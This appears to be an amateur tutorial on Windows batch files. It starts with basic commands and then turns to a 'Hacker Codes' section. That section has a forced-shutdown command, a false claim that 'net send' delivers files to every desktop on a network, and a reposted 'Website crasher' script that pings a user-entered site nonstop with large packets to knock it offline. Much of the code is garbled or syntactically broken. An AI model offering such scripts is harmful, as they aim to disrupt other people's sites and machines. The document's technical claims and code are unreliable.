BATCH (.bat) Files
OK don't worry we aren't getting that advance yet we just started.
but still let me set up my legend
* = 1st time start coding , 2nd time stop
%N% = whatever name here you want (change the name each time if its a choice)
%C% = choice (means the choice number for example look below)
() = don't type this.
echo 1.START
set /p input0=
if %input0% equ 1 goto START
well 1=%C%
1st Step (BASICS)
the first few codes you should learn is these.
@echo off
echo %N%
take some time to use these in either Notepad or Notepad++ (if you want to make a living out of this you should use notepad++)
next codes are a bit more advance.
set /p input%N%=
if %input%N% equ 1 goto START
if %input%N% equ 2 exit
if you think that's hard well we're just getting started just get used to this (note it when i first started i forgot how to do this quite a bit)
also when you use
set /p input%N%
always change the number of the input other wise it won't work right.
delay codes
timeout 5 (or any number you want to delay)
NETSH Diag Ping Loopback (5 seconds delay it doesn't shop up on the users perspective and unfournately can't be extended)
Step 2 . a Few Hacker Codes
WARNING: we are not held responsible for how this information is used or enhanced.
%F% = file name (you want to send)
net send %F% (sends the whole network a file and instantly shows up in their desktop)
start shutdown -s -t 10 -c "shut down message here."
@echo off
@title Website crasher
color Oe
echo Enter the website you wish to crash
set input=
set /p input= Enter website here :
if %input%==goto A if NOT B
echo processing Your request
ping localhost>nul
echo to end crashing press CTRL + C
ping localhost>nul
echo ___________________________________________________________________
echo Now crashing website...DO NOT CLOSE THIS BOX!! PRESS CTLR + C TO END
ping %input% -t -l 1000
By the way i copied this from another user but i thought it was really cool and deiced to re-post it.
thank you for reading and learning.